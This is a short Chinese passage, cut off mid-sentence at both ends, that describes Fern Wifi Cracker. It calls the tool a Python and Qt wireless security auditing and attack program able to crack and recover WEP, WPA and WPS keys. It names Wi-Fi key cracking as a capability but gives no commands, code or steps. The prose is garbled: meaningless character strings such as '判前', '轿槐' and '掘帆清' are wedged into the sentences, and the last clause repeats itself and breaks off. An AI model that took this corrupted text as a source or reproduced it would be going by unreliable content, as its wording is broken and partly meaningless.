支持WPSwifi芯片。Fern Wifi Cracker是一种无线安全审计和攻击软件编写的程序，使用Python编程语言和判前Python的Qt图形界面库，该程序轿槐是能够破解和恢复WEP、WPA、WPS键和无线或以太网上运行其他基于网络的掘帆清攻击基于网络的